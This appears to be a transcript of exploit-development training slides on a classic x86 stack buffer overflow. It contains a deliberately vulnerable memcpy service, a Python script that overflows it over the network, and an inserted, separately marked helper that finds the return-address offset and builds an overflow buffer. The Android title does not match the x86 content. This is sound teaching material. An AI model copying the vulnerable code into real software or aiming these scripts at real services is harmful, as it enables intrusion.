Exploit Research
Transcript
Metasploit Framework
READY TO ROLL
PRESENTED BY: JASKARAN SINGH
Android 4.1.2 (Linux 3.3) Exploitation
Exploit Writing
◦ Windows Assembly Language
◦ Linux Assembly Language
◦ Networking Basics
◦ Socket programming
◦ Python/Ruby/Perl/C/C++/…
Memcpy Buffer Overflow Exploit
[Figure: x86 stack frame, high memory at the top, low memory at the bottom]
    ARG2
    ARG1
    RET (Return Address)
    EBP-old (Previous Base Pointer)   <- BP (Base Pointer / Frame Pointer)
    Local variables                   <- SP (Stack Pointer)

[Figure: frame of test() below, two panels (a) and (b), top to bottom]
    Str (pointer to a string)
    Return Address
    EBP-old (Previous Base Pointer)
    Buffer[0] … Buffer[7]
    var_a
#include <string.h>

void test(char *str)
{
    char buffer[12];
    int var_a;
    strcpy(buffer, str);    /* no length check: bytes past buffer[11] land on var_a, EBP-old and RET */
}

int main()
{
    char *str = "Larger than 12 bytes";
    test(str);
    return 0;
}
char a[3]
a = "EXPLOIT"

    a[0] a[1] a[2] | overwritten memory locations
     E    X    P   |  L    O    I    T
Vulnerable Code
#include <string.h>

// listening on port 6767
int vul_func(char *input)
{
    char buffer[256];
    memcpy(buffer, input, 1024);    // copies 1024 bytes into a 256-byte buffer: 768 bytes overrun the frame
    return 1;
}
Exploit Code
#!/usr/bin/python
import socket, sys

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sock.connect((sys.argv[1], 6767))    # argument passed is IP address
buffer = b"J" * 2000                 # 2000 bytes of 0x4A, far more than the 256-byte buffer
sock.send(buffer)
sock.close()
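The two steps the slides sketch, finding how far into the input the return address sits and then placing a chosen address and payload there, worked as an added Python example that is not part of the original deck. It reimplements the idea behind Metasploit's pattern_create/pattern_offset tools (a cyclic pattern in which every 4-byte window is unique) and builds the 1024-byte buffer that vul_func() copies. The crash value 0x37694136, the return address 0xAABBCC08 and the int3 payload are constructed for the demo; the 260-byte offset (256-byte buffer plus a 4-byte saved EBP on 32-bit x86) assumes the compiler added no padding or other locals.

```python
#!/usr/bin/env python3
"""Added example: locate the EIP offset and build the overflow buffer
for a vul_func()-style memcpy overflow (not code from the original slides)."""
import string
import struct


def pattern_create(length):
    """Metasploit-style cyclic pattern: triples of UPPER/lower/digit,
    so every 4-byte window is unique for the first 20280 bytes."""
    chunks = []
    for u in string.ascii_uppercase:
        for l in string.ascii_lowercase:
            for d in string.digits:
                chunks.append(u + l + d)
                if 3 * len(chunks) >= length:
                    return "".join(chunks)[:length]
    raise ValueError("a pattern longer than 20280 bytes is no longer unique")


def pattern_offset(eip, length=20280):
    """Offset into the pattern that ended up in EIP, or -1 if it is not
    from the pattern (e.g. the crash was not a plain return-address overwrite).
    eip may be the integer shown by the debugger (x86 is little-endian, so
    the bytes are reversed before searching) or the 4 characters as stored."""
    if isinstance(eip, int):
        needle = struct.pack("<I", eip).decode("latin-1")
    else:
        needle = eip
    return pattern_create(length).find(needle)


def build_exploit(offset, ret_addr, payload, copy_len=1024, nop_sled=16):
    """Lay out [padding][ret][NOP sled][payload][filler] to exactly copy_len
    bytes, the amount the vulnerable memcpy copies. The address is packed
    little-endian because that is how the CPU reads it off the stack."""
    buf = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nop_sled + payload
    if len(buf) > copy_len:
        raise ValueError("payload does not fit in %d bytes" % copy_len)
    return buf + b"C" * (copy_len - len(buf))


if __name__ == "__main__":
    # Constructed crash: pretend pattern_create(2000) was sent instead of
    # "J" * 2000 and the debugger then showed EIP = 0x37694136.
    off = pattern_offset(0x37694136)
    print("return address overwritten at offset", off)      # 260 for buffer[256] + saved EBP
    # 0xAABBCC08 is a hypothetical stand-in for a real jump/return address.
    exploit = build_exploit(off, 0xAABBCC08, b"\xcc" * 4)   # int3 payload, constructed
    print(len(exploit), "bytes ready to send to port 6767")
```

Replace `b"J" * 2000` in the exploit above with `pattern_create(2000)` for the crash run, feed the EIP value from the debugger to `pattern_offset`, and send the result of `build_exploit` on the second run; the `-1` return guards against reading an offset out of a crash that was not a return-address overwrite.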
Crash…
Debugger
After Attack
Memory…
[Figure: stack after the attack as seen in the debugger. The slots ARG2, ARG1, RET, EBP-old and Local var1 all read 41414141; EIP = 41414141; the stack dump reads 4141414141414141414141414141414141414141]
Successful Exploitation
[Figure: stack after successful exploitation, top to bottom: PAYLOAD; 4A4A4A4A, 4A4A4A4A, 4A4A4A4A (0x4A is the 'J' the exploit sends); AABBCC08, AABBCC04, AABBCC00; label EIP]